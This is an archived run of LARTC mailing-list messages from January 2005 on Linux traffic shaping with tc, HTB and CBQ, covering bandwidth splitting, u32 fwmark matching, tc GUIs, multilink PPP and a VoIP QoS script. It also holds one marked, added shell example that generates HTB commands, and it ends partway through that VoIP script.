Jan 2005 01:09:41 -0800 (PST) Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? Message-ID: <20050105090941.73415.qmail@web51608.mail.yahoo.com> --0-1263255390-1104916181=:73275 Content-Type: text/plain; charset=us-ascii Hello, I want to share/split bandwidth on a link with unknown bandwidth. I want to exactly share/split bandwidth (for example : FTP 30% , HTTP 20% or 30% for a group of PCs and so forth.) 
"Traffic-Control-HOWTO" talk that PRIO scheduler is an ideal match for "Handling a link with a variable (or unknown) bandwidth". But PRIO scheduler can not exactly share/split bandwidth . Could you tell me if I can exactly share/split bandwidth on a link with a variable (or unknown) bandwidth? If it is possible, how can I do that ? Thanks in advance! nhgiang. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com --0-1263255390-1104916181=:73275 Content-Type: text/html; charset=us-ascii
--0-1263255390-1104916181=:73275-- From util@deuroconsult.ro Wed Jan 5 10:05:07 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Wed, 5 Jan 2005 12:05:07 +0200 (EET) Subject: [LARTC] [PATCH] mark in u32 Message-ID: This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. ---1646943047-595155148-1104919507=:9453 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed Hello, Stephen, List! Attached is the patch for iproute2 to add the possibility to use fwmark in u32 filters. The kernel part was included in 2.6.10. Please apply! Thank you! For more info: - Kernel patch (not needed for 2.6.10): http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch - Examples: http://kernel.umbrella.ro/net/mark_in_u32/examples.txt --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ---1646943047-595155148-1104919507=:9453 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="iproute2-match-mark-in-u32.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="iproute2-match-mark-in-u32.patch" ---1646943047-595155148-1104919507=:9453--
From lartc@draxinusom.ch Wed Jan 5 12:07:26 2005 From: lartc@draxinusom.ch (Rene Gallati) Date: Wed, 05 Jan 2005 13:07:26 +0100 Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? In-Reply-To: <20050105090941.73415.qmail@web51608.mail.yahoo.com> References: <20050105090941.73415.qmail@web51608.mail.yahoo.com> Message-ID: <41DBD87E.6060807@draxinusom.ch> Hello, > I want to share/split bandwidth on a link with unknown bandwidth. I > want to exactly > share/split bandwidth (for example : FTP 30% , HTTP 20% or 30% for > a group of PCs and so forth.) > > "Traffic-Control-HOWTO" talk that PRIO scheduler is an ideal match for > "Handling a link with a variable (or unknown) bandwidth". > > But PRIO scheduler can not exactly share/split bandwidth . > > Could you tell me if I can exactly share/split bandwidth on a link with > a variable (or unknown) bandwidth? If it is possible, how can I do that ? [Warning irony ahead] I'll give you a complete script if you tell me how many bits/sec exactly 30% of unknown is.
[/irony] In other words: You don't know how much there is available, I don't know it, the list doesn't know it and your computer can't know it either. So no - that's not possible (and should be evident, hopefully) What you CAN do is let some ping run alongside and react to changes in the latency it sees across the link - then adapt the script and thus changing the parameters. This needs lot of experimentation, is a bad hack but maybe it is sufficient for what you are trying to achieve. Otherwise, find a minimum value of bandwidth you never drop below and set that as the maximum bandwidth available for your root qdisc. This gives you the predictability. Or : find a better line/ISP. Find and drop abusive users/applications. But all in all, there's not much you can actually do in your situation. -- C U - -- ---- ----- -----/\/ René Gallati \/\---- ----- --- -- - From msuzen@kibris.net Wed Jan 5 14:25:12 2005 From: msuzen@kibris.net (Mehmet Ali Suzen) Date: Wed, 5 Jan 2005 16:25:12 +0200 (EET) Subject: [LARTC] tc and ntop inconsistent trafic. Message-ID: <37621.212.175.247.7.1104935112.squirrel@webmail2.kibris.net> Dear List, I am trying to limit some IP blocs with tc with following three step. # interface tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit # class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \ allot 1500 prio 5 bounded isolated # rules # download tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip dst 10.0.1.0/24 flowid 1:1 # upload tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ match ip src 10.0.1.0/24 flowid 1:1 Problem is when I try to measure traffic with ntop (www.ntop.org), it is seen that overall traffic which that ip block handles is much higher then 64kbit, actually it is about 500Kbps which is not what I want !. 
tc -s class show dev eth0 shows that I got the following [root@nat root]# /usr/local/sbin/traffic-limit.sh status class cbq 1: root rate 168Kbit (bounded,isolated) prio no-transmit Sent 6068639 bytes 5841 pkts (dropped 0, overlimits 0) borrowed 0 overactions 0 avgidle 38094 undertime 0 class cbq 1:1 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 1460691 bytes 3174 pkts (dropped 0, overlimits 12339) borrowed 0 overactions 1372 avgidle -115477 undertime -33146 class cbq 1:2 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 2336291 bytes 3192 pkts (dropped 0, overlimits 32606) borrowed 0 overactions 2376 avgidle 38094 undertime 0 class cbq 1:3 parent 1: rate 84Kbit (bounded,isolated) prio 5 Sent 3125820 bytes 4851 pkts (dropped 0, overlimits 1053) borrowed 0 overactions 521 avgidle 2631 undertime 0 class cbq 1:4 parent 1: rate 8Kbit (bounded,isolated) prio 5 Sent 217663 bytes 496 pkts (dropped 0, overlimits 3553) borrowed 0 overactions 363 avgidle -195655 undertime -8.22928e+08 Many thanks for any kind of comment why it is different? -Mehmet From dseshadri@broadbandmaritime.com Wed Jan 5 14:55:46 2005 From: dseshadri@broadbandmaritime.com (Deepak Seshadri) Date: Wed, 5 Jan 2005 09:55:46 -0500 Subject: [LARTC] TC GUI or graphs? Message-ID: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Hello everybody, I am new to the lartc mailing list. I have been using "tc" for some time now. To be precise, tc & HTB to shape traffic. I did a lot of search on Google for 2 things: - A GUI to create configure new qdiscs & classes for HTB - A utility that will graph the data sent through all configured classes or qdiscs. I could not find anything. Could someone tell me if a GUI exists or a graphing utility for tc? If my post is a repeat, could someone tell me where the archive is? I'll search the archive, before posting here. 
Thank you, Deepak Seshadri From andy.furniss@dsl.pipex.com Wed Jan 5 14:59:44 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 14:59:44 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: References: Message-ID: <41DC00E0.2070300@dsl.pipex.com> Catalin(ux aka Dino) BOIE wrote: > Hello, Stephen, List! > > Attached is the patch for iproute2 to add the possibility to use fwmark > in u32 filters. > The kernel part was included in 2.6.10. > > Please apply! > Thank you! > > For more info: > - Kernel patch (not needed for 2.6.10): > http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch > > - Examples: > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ That looks handy :-) Do you know why fw mark doesn't work with policers in 2.6 (assuming it's not just me) To stephen - I may be wrong here but in the readme it says that default kernel include is /usr/src/linux/include but if I grep for KERNEL_INCLUDE I see :- ./Makefile:KERNEL_INCLUDE:=/usr/include ./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES) ./Makefile: ./configure $(KERNEL_INCLUDE) ./README:KERNEL_INCLUDE should point to correct linux kernel include directory. ISTR having to mess about a bit last time when applying esfq patch to get it to work. Andy. From tgraf@suug.ch Wed Jan 5 15:10:26 2005 From: tgraf@suug.ch (Thomas Graf) Date: Wed, 5 Jan 2005 16:10:26 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC00E0.2070300@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> Message-ID: <20050105151026.GR26856@postel.suug.ch> > That looks handy :-) Do you know why fw mark doesn't work with policers > in 2.6 (assuming it's not just me) Be prepared to see it removed again in favour of the meta extended match. Don't rely too much on it. Regarding fw, what exactly is not working? 
fw doesn't handle police results properly, the patchset at http://people.suug.ch/~tgr/patches/pending/ fixes this. Given its another issue, I would be curious to know what exactly is not working. > ISTR having to mess about a bit last time when applying esfq patch to > get it to work. Would you guys like to see esfq included in mainline? From andy.furniss@dsl.pipex.com Wed Jan 5 15:25:12 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 15:25:12 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050105151026.GR26856@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> Message-ID: <41DC06D8.70301@dsl.pipex.com> Thomas Graf wrote: >>That looks handy :-) Do you know why fw mark doesn't work with policers >>in 2.6 (assuming it's not just me) > > > Be prepared to see it removed again in favour of the meta extended > match. Don't rely too much on it. I searched a bit around meta data recently but couldn't find much - do you have any links? > > Regarding fw, what exactly is not working? fw doesn't handle police > results properly, the patchset at http://people.suug.ch/~tgr/patches/pending/ > fixes this. Given its another issue, I would be curious to know what > exactly is not working. It was for a test I did, though I notice some of the diffserv examples use it aswell (albeit with ipchains). http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 > > >>ISTR having to mess about a bit last time when applying esfq patch to >>get it to work. > > > Would you guys like to see esfq included in mainline? > Yea - that would be great :-) Andy. 
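Added example, not part of any poster's message: for the "Sharing/splitting bandwidth" thread above, this combines Rene Gallati's advice (use a rate the link never drops below as the root rate) with the percentage split the original poster asked for. The function name htb_plan, the device eth1, the 2000 kbit floor and the port matches are assumptions made for illustration.

```shell
#!/bin/sh
# Added example with constructed inputs: split a guaranteed floor rate into
# HTB classes by percentage. Device, floor, shares and ports are assumptions.

# htb_plan DEV FLOOR_KBIT SHARE:DPORT [SHARE:DPORT ...]
#   FLOOR_KBIT  rate in kbit/s the link is known never to drop below
#   SHARE       percent of the floor guaranteed to traffic sent to DPORT
# Prints the tc commands without running them; returns 1 on bad input.
htb_plan() {
    if [ "$#" -lt 3 ]; then
        echo "usage: htb_plan DEV FLOOR_KBIT SHARE:DPORT ..." >&2
        return 1
    fi
    dev=$1
    floor=$2
    shift 2

    case $floor in
        ''|0*|*[!0-9]*) echo "floor must be a positive whole number" >&2; return 1 ;;
    esac

    # Pass 1: validate every spec before printing a single command.
    total=0
    used=0
    for spec in "$@"; do
        case $spec in
            *:*) ;;
            *) echo "expected SHARE:DPORT, got '$spec'" >&2; return 1 ;;
        esac
        share=${spec%%:*}
        port=${spec#*:}
        case $share in
            ''|0*|*[!0-9]*) echo "bad share in '$spec'" >&2; return 1 ;;
        esac
        case $port in
            ''|*[!0-9]*) echo "bad port in '$spec'" >&2; return 1 ;;
        esac
        if [ $((floor * share / 100)) -lt 1 ]; then
            echo "share in '$spec' rounds down to 0 kbit" >&2
            return 1
        fi
        total=$((total + share))
        used=$((used + floor * share / 100))
    done

    # Unclassified traffic needs a non-zero guarantee too, so keep some back.
    if [ "$total" -ge 100 ]; then
        echo "shares add up to ${total}%; must stay below 100%" >&2
        return 1
    fi
    rest=$((floor - used))

    # Pass 2: root qdisc, parent class capped at the floor, default class 1:2.
    echo "tc qdisc add dev $dev root handle 1: htb default 2"
    echo "tc class add dev $dev parent 1: classid 1:1 htb rate ${floor}kbit ceil ${floor}kbit"
    echo "tc class add dev $dev parent 1:1 classid 1:2 htb rate ${rest}kbit ceil ${floor}kbit"

    # One leaf class and one u32 filter per spec. tc reads class ids as hex;
    # the digit strings generated here are valid hex and never collide with 1 or 2.
    id=10
    for spec in "$@"; do
        share=${spec%%:*}
        port=${spec#*:}
        rate=$((floor * share / 100))
        echo "tc class add dev $dev parent 1:1 classid 1:$id htb rate ${rate}kbit ceil ${floor}kbit"
        echo "tc filter add dev $dev parent 1: protocol ip prio 1 u32 match ip dport $port 0xffff flowid 1:$id"
        id=$((id + 1))
    done
}

# Constructed call: 2000 kbit floor, 30% to port 21 (FTP control channel only;
# FTP data connections need their own match), 20% to port 80 (HTTP).
htb_plan eth1 2000 30:21 20:80
```

Each class may borrow up to the floor through ceil, so the percentages are guarantees under contention rather than hard caps.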
From tgraf@suug.ch Wed Jan 5 15:52:50 2005 From: tgraf@suug.ch (Thomas Graf) Date: Wed, 5 Jan 2005 16:52:50 +0100 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DC06D8.70301@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> Message-ID: <20050105155250.GA17836@postel.suug.ch> * Andy Furniss <41DC06D8.70301@dsl.pipex.com> 2005-01-05 15:25 > Thomas Graf wrote: > >>That looks handy :-) Do you know why fw mark doesn't work with policers > >>in 2.6 (assuming it's not just me) > > > > > >Be prepared to see it removed again in favour of the meta extended > >match. Don't rely too much on it. > > I searched a bit around meta data recently but couldn't find much - do > you have any links? http://oss.sgi.com/archives/netdev/2004-12/msg00767.html http://oss.sgi.com/archives/netdev/2005-01/msg00028.html > http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 Do you see the police/action stats being updated? i.e. does the matching itself work? Ingress qdisc reads from prerouting hook as well, might be a priority issue. From Joe Nuts Wed Jan 5 15:55:51 2005 From: Joe Nuts (Joe Nuts) Date: Wed, 5 Jan 2005 09:55:51 -0600 Subject: [LARTC] Load Balance Outbound AND Inbound Internet Traffic to one location over multiple links In-Reply-To: <41CF1920.6040307@dsl.pipex.com> References: <41C97943.3000003@dsl.pipex.com> <41CF1920.6040307@dsl.pipex.com> Message-ID: Thanks again for the response, Andy. I've done a tremendous amount of research, and set-up to test the multi-link ppp, and I still have not been successful in my search. The problem i've found out from working with ppp, and pppoe, is that I can only create a ppp connection between two devices on the same broadcast network. I.E. two devices connected by some kind of bridged ethernet. This wouldnt be an option for me, because the DSL connections to the client make it to the ISP over an ATM line, directly to a router. 
The router plugs in to a layer-2 switch, which then our server plugs in to. I would need to create maybe a GRE tunnel from the client to the server, so that the pppoe client requests would make it to the server, to then create the ppp connection. And that's just to get the one connection going, I'd like to be able to multilink multiple connections. If there were some way to multilink gre (or IPIP) tunnels, to get combined bandwidth on single connections, that would be ideal. But I have not found any solutions along those lines. My next attempts will be multilink pppoe tunnels over gre tunnels, and I'm also researching what BSD has to offer in that arena. Any suggestions are welcome. Thanks -Joe Comeaux On Sun, 26 Dec 2004 20:03:44 +0000, Andy Furniss wrote: > Joe Nuts wrote: > > I have boxes at both ends of the link. I have spent my whole day > > searching the internet on anything to do with 'multilink ppp', and > > have not found any decent documentation on how to set something like > > that up. Perhaps someone could point me to something? > > I am not sure about setting up a server, but there must be a few > examples of client setups around for ISDN. Here is one for DSL > > http://www.freestuffjunction.co.uk/bondedadsl.shtml > > > > As for the setup, server at the ISP has one public IP A, on public > > network A. it receives/routes traffic for public network B. > > the server at the client site has two public IP's, X and Y on public > > network X and Y. > > I would like for traffic sent to public network B to make it to client > > computer, divided across the two IP's X, and Y. (this traffic will of > > course go through server at the ISP, which will do the work in > > splitting the traffic up) > > You probably know more advanced routing than me - I have never played > about with complicated setups.
As far as using ppp - I don't think you > have to worry about IP addresses too much - it's link level, so I think > you can send whatever you like down it and it will appear at the other end. > > Andy. > > From andy.furniss@dsl.pipex.com Wed Jan 5 16:40:32 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 05 Jan 2005 16:40:32 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <20050105155250.GA17836@postel.suug.ch> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> Message-ID: <41DC1880.6090405@dsl.pipex.com> Thomas Graf wrote: > * Andy Furniss <41DC06D8.70301@dsl.pipex.com> 2005-01-05 15:25 > >>Thomas Graf wrote: >> >>>>That looks handy :-) Do you know why fw mark doesn't work with policers >>>>in 2.6 (assuming it's not just me) >>> >>> >>>Be prepared to see it removed again in favour of the meta extended >>>match. Don't rely too much on it. >> >>I searched a bit around meta data recently but couldn't find much - do >>you have any links? > > > http://oss.sgi.com/archives/netdev/2004-12/msg00767.html > http://oss.sgi.com/archives/netdev/2005-01/msg00028.html Thanks. > > >>http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 > > > Do you see the police/action stats being updated? i.e. does > the matching itself work? From memory yes - counters showed OK on iptables and tc -s qdisc ls dev eth0 just no drops I'll repeat tonight to be sure. Andy. > > Ingress qdisc reads from prerouting hook as well, might be > a priority issue. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From jasonb@edseek.com Wed Jan 5 16:52:13 2005 From: jasonb@edseek.com (Jason Boxman) Date: Wed, 5 Jan 2005 11:52:13 -0500 Subject: [LARTC] TC GUI or graphs? 
In-Reply-To: <200501051455.j05Etk3f083069@jkcpub.iserver.net> References: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Message-ID: <200501051152.13693.jasonb@edseek.com> On Wednesday 05 January 2005 09:55, Deepak Seshadri wrote: > Hello everybody, > > I am new to the lartc mailing list. I have been using "tc" for some time > now. To be precise, tc & HTB to shape traffic. I did a lot of search on > Google for 2 things: > > - A GUI to create configure new qdiscs & classes for HTB There are two projects, the one I remember being lql, designed at creating libraries for plugging into netlink directly for QoS stuff. One of these days there will probably be a nice GUI available. Presently I don't know of any. > - A utility that will graph the data sent through all configured classes or > qdiscs. I hacked a Perl script[1] to graph shaping configuration leafs. It either writes values to a RRDTool database or sends the information off to Munin for it to play with. I briefly discuss usage in my traffic control guide[2]. [1] http://trekweb.com/~jasonb/code/polltc-1.01.tar.gz [2] http://trekweb.com/~jasonb/articles/traffic_shaping/monitoring.html > I could not find anything. Could someone tell me if a GUI exists or a > graphing utility for tc? If my post is a repeat, could someone tell me > where the archive is? I'll search the archive, before posting here. > -- Jason Boxman Perl Programmer / *NIX Systems Administrator Shimberg Center for Affordable Housing | University of Florida http://edseek.com/ - Linux and FOSS stuff From imipak@yahoo.com Wed Jan 5 16:59:20 2005 From: imipak@yahoo.com (Jonathan Day) Date: Wed, 5 Jan 2005 08:59:20 -0800 (PST) Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? 
In-Reply-To: <41DBD87E.6060807@draxinusom.ch> Message-ID: <20050105165920.59898.qmail@web12307.mail.yahoo.com> In the past, people played with routing protocols such as HELLO and FUZZBALL which reacted to the latency on each link. They gave up. It turns out that overly reactive systems are not that useful. The gains are dubious, and the costs on resources are high. The other factor is in what the original poster meant by an "exact" split. Exact over what timeframe? Over any given instant, only one packet is being sent (it's a serial stream) so the split over that amount of time is always 100% of whatever it's doing. On the other hand, if it's an exact split over a fairly long timeslice, you use a class-based queueing system and measure what's been sent out of each queue. You then predict what the net bandwidth is over the whole timeslice, by looking at what gets sent and what gets dropped. Each time you adjust the prediction, you adjust the hard limits for the queues to allow out whatever is left of that class' net bandwidth. A third approach is to see what you can do with ECN and other back-propagating QoS protocols to throttle given queues that reach or exceed their limits. That way, you don't need to care what the bandwidths are at any given time, because the primary router that divvies up the bandwidth can throttle in proportion to how it does that division. --- Rene Gallati wrote: > Hello, > > > I want to share/split bandwidth on a link with > unknown bandwidth. I > > want to exactly > > share/split bandwidth (for example : FTP 30% , > HTTP 20% or 30% for > > a group of PCs and so forth.) > > > > "Traffic-Control-HOWTO" talk that PRIO scheduler > is an ideal match for > > "Handling a link with a variable (or unknown) > bandwidth". > > > > But PRIO scheduler can not exactly share/split > bandwidth . > > > > Could you tell me if I can exactly share/split > bandwidth on a link with > > a variable (or unknown) bandwidth? If it is > possible, how can I do that ?
> > [Warning irony ahead] > I'll give you a complete script if you tell me how > many bits/sec exactly > 30% of unknown is. > [/irony] > > In other words: You don't know how much there is > available, I don't know > it, the list doesn't know it and your computer > can't know it either. > So no - that's not possible (and should be evident, > hopefully) > > What you CAN do is let some ping run alongside and > react to changes in > the latency it sees across the link - then adapt the > script and thus > changing the parameters. This needs lot of > experimentation, is a bad > hack but maybe it is sufficient for what you are > trying to achieve. > > Otherwise, find a minimum value of bandwidth you > never drop below and > set that as the maximum bandwidth available for your > root qdisc. This > gives you the predictability. > > Or : find a better line/ISP. Find and drop abusive > users/applications. > > But all in all, there's not much you can actually do > in your situation. > -- > > C U > > - -- ---- ----- -----/\/ René Gallati > \/\---- ----- --- -- - > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: > http://lartc.org/ > __________________________________ Do you Yahoo!? Yahoo! Mail - Easier than ever with enhanced search. Learn more. http://info.mail.yahoo.com/mail_250 From horst.graffy@wiesbaden.netsurf.de Wed Jan 5 17:08:30 2005 From: horst.graffy@wiesbaden.netsurf.de (Horst Graffy) Date: Wed, 5 Jan 2005 18:08:30 +0100 Subject: [LARTC] TC GUI or graphs? In-Reply-To: <200501051455.j05Etk3f083069@jkcpub.iserver.net> References: <200501051455.j05Etk3f083069@jkcpub.iserver.net> Message-ID: <200501051808.31084.horst.graffy@wiesbaden.netsurf.de> Am Mittwoch, 5. Januar 2005 15:55 schrieb Deepak Seshadri: > - A GUI to create configure new qdiscs & classes for HTB > - A utility that will graph the data sent through all configured classes or > qdiscs. 
> > I could not find anything. Could someone tell me if a GUI exists or a > graphing utility for tc? If my post is a repeat, could someone tell me > where the archive is? I'll search the archive, before posting here. have a look at: http://www.jarod.mpn.pl/htbgui.html http://www.zone.ee/ktc/ From imipak@yahoo.com Wed Jan 5 17:30:06 2005 From: imipak@yahoo.com (Jonathan Day) Date: Wed, 5 Jan 2005 09:30:06 -0800 (PST) Subject: [LARTC] TC GUI or graphs? In-Reply-To: <200501051152.13693.jasonb@edseek.com> Message-ID: <20050105173006.10237.qmail@web12302.mail.yahoo.com> There are GUIs for HTB, but no guarantee they'll work with current systems or with what you want to do. http://freshmeat.net/projects/easyshape/ http://freshmeat.net/projects/khtb/ http://freshmeat.net/projects/ktctool/ http://freshmeat.net/projects/bwmtools/ http://freshmeat.net/projects/htbgui/ http://freshmeat.net/projects/arbitrator/ http://freshmeat.net/projects/ibmonitor/ P.S. I rarely use Google to search for software. :) --- Jason Boxman wrote: > On Wednesday 05 January 2005 09:55, Deepak Seshadri > wrote: > > Hello everybody, > > > > I am new to the lartc mailing list. I have been > using "tc" for some time > > now. To be precise, tc & HTB to shape traffic. I > did a lot of search on > > Google for 2 things: > > > > - A GUI to create configure new qdiscs & classes > for HTB > > There are two projects, the one I remember being > lql, designed at creating > libraries for plugging into netlink directly for QoS > stuff. One of these > days there will probably be a nice GUI available. > Presently I don't know of > any. __________________________________ Do you Yahoo!? Yahoo! Mail - now with 250MB free storage. Learn more. http://info.mail.yahoo.com/mail_250 From jasonb@edseek.com Wed Jan 5 18:19:31 2005 From: jasonb@edseek.com (Jason Boxman) Date: Wed, 5 Jan 2005 13:19:31 -0500 Subject: [LARTC] Sharing/splitting bandwidth on a link while bandwidth of the link is variable (or unknown) ? 
In-Reply-To: <20050105165920.59898.qmail@web12307.mail.yahoo.com> References: <20050105165920.59898.qmail@web12307.mail.yahoo.com> Message-ID: <200501051319.31386.jasonb@edseek.com> On Wednesday 05 January 2005 11:59, Jonathan Day wrote: > On the other hand, if it's an exact split over a > fairly long timeslice, you use a class-based queueing > system and measure what's been sent out of each queue. > You then predict what the net bandwidth is over the > whole timeslice, by looking at what gets sent and what > gets dropped. Each time you adjust the prediction, you > adjust the hard limits for the queues to allow out > whatever is left of that class' net bandwidth. I wish there was something like that available for PPP over ATM links. My ADSL connection varies between 160Kbps and 224Kbps depending on how many ATM cells are wasted by mostly null cells. I'm stuck with a rate of 160Kbps since that's the lowest stable rate I could find that works under the worst case scenario of many, small Ethernet packets. Sadly I miss out when my connection is not in that worst state. From jan.rovner@diadema.cz Wed Jan 5 19:28:14 2005 From: jan.rovner@diadema.cz (Jan Rovner) Date: Wed, 5 Jan 2005 20:28:14 +0100 Subject: [LARTC] Shaping the sum of incoming and outgoing traffic Message-ID: Hello, does anyone have a working solution for the shaping both incoming and outgoing traffic in such way, that for a given client the *sum* of incoming and outgoing traffic is somehow defined? My ISP does the same thing, it gives me just a line of a defined rate, no matter the traffic direction (i.e. here is your line, the clock speed is 1024kbps, do what you want). I'm a little bit familiar with HTB, my download shaping works fine. However, I would like to shape both incoming+outgoing traffic in a way that the sum of actual outgoing and incoming rates of all my clients would be always below the ISP's line speed in order to get shaping working.
In other words, I would like to split the ISP's line into a bunch of
hierarchical "virtual" lines with traffic borrowing etc. like HTB does
for download, but with defined *total* rates (i.e. dear customer, here
is your 128kbps line, do what you want).

What can I do with HTB is to shape incoming and traffic separately
(somehow to virtually split the line for upload/download with limited
speeds), but this is not the way I would like it to be, since would like
to get the line used as effective as possible.

Maybe something like IMQ would work, but unfortunately I have found no
example for that solution.

Any ideas?

Jan Rovner

From rsenykoff@harrislogic.com Wed Jan 5 20:41:50 2005
From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com)
Date: Wed, 5 Jan 2005 14:41:50 -0600
Subject: [LARTC] Best QoS Policy for VoIP
Message-ID:

Hello all,

I've got a couple redundant (Spanning Tree Protocol) boxes running FC1 minimal install + bridge-utils and they are working great for QoS + ntop monitoring. I'm wondering if I should handle the VoIP traffic a little differently. I don't mind letting VoIP and Video lend out traffic when it isn't being used, so that's why I gave them such large chunks of the bandwidth. Especially the video, which is only used sometimes, and even then it only usually needs around 400 / 400. It seems that CBQ is pretty good just because I can vary the bounded / isolated stuff. For example, Citrix is isolated and always gets that bandwidth. Video and VoIP are bounded, but not isolated. Sametime is an instant messaging client. Here's my script (have 2 scripts, both the same except that one is for eth0, the other for eth1). Also, we have 3Mb / 3Mb connection.

#!/bin/sh
#####################################
############ VARIABLES ##############
#                                   #
e=eth0       # interface
t1=2.40Mbit  # size of your WAN - remember you can't max this or you'll experience latency. 75-80% of max is a good place to start.
el=100Mbit   # size of eth0
w=0.24Mbit   # weighting of your WAN (10% of t1)

sizeCitrix=0.4Mbit
sizeVoIP=0.8Mbit
sizeVideo=1.0Mbit
sizeBulk=0.1Mbit
sizeSametime=0.1Mbit

weightCitrix=0.04Mbit
weightVoIP=0.08Mbit
weightVideo=0.1Mbit
weightBulk=0.01Mbit
weightSametime=0.01Mbit

CONNECTRIA1="XXX.XXX.XXX.XXX"
CONNECTRIA2="XXX.XXX.XXX.XXX"
SAMETIME="XXX.XXX.XXX.XXX"

#                                   #
#####################################
#####################################

# Delete any old rules #
tc qdisc del root dev $e

## each class is able to take more bandwidth as it is available, but must
## surrender it as the higher priorities (2, 3, then 4) need it.
## The lower the priority number, the more priority it gets. Thus when
## there is extra bandwidth available, the lower number classes get it as
## they need it.

# root qdisc /  qdisc = queueing discipline #
tc qdisc add dev $e root handle 1:0 cbq bandwidth 100Mbit avpkt 1000 cell 8

tc class add dev $e parent 1:0 classid 1:1 cbq bandwidth 100Mbit rate $t1 weight $w prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000 bounded

# child qdiscs (like child nodes on a tree) #
tc class add dev $e parent 1:1 classid 1:3 cbq bandwidth 100Mbit rate $sizeCitrix weight $weightCitrix prio 8 allot 1514 cell 8 maxburst 20 avpkt 300 isolated
tc qdisc add dev $e parent 1:3 handle 30: sfq perturb 20

tc class add dev $e parent 1:1 classid 1:5 cbq bandwidth 100Mbit rate $sizeVoIP weight $weightVoIP prio 8 allot 1514 cell 8 maxburst 20 avpkt 204 bounded

tc class add dev $e parent 1:1 classid 1:6 cbq bandwidth 100Mbit rate $sizeVideo weight $weightVideo prio 8 allot 1514 cell 8 maxburst 20 avpkt 580 bounded

tc class add dev $e parent 1:1 classid 1:7 cbq bandwidth 100Mbit rate $sizeSametime weight $weightSametime prio 8 allot 1514 cell 8 maxburst 20 avpkt 550
tc qdisc add dev $e parent 1:7 handle 70: sfq perturb 20

tc class add dev $e parent 1:1 classid 1:9 cbq bandwidth 100Mbit rate $sizeBulk weight $weightBulk prio 8 allot 1514 cell 8 maxburst 20 avpkt 1000
tc qdisc add dev $e parent 1:9 handle 90: sfq perturb 20

#####################################
############### Citrix ##############
#                                   #

# SSH #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 22 0xffff flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 22 0xffff flowid 1:3

# CITRIX/ICA #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 1494 0xffff flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 1494 0xffff flowid 1:3

# CITRIX Metaframe #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA1/32 flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA1/32 flowid 1:3

tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $CONNECTRIA2/32 flowid 1:3
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $CONNECTRIA2/32 flowid 1:3

#####################################
############### VoIP ################
#                                   #

# IAX # this is the old format - IAX2 should be what's really seen going on
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 5036 0xffff flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 5036 0xffff flowid 1:5

# IAX2 #
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip sport 4569 0xffff flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dport 4569 0xffff flowid 1:5

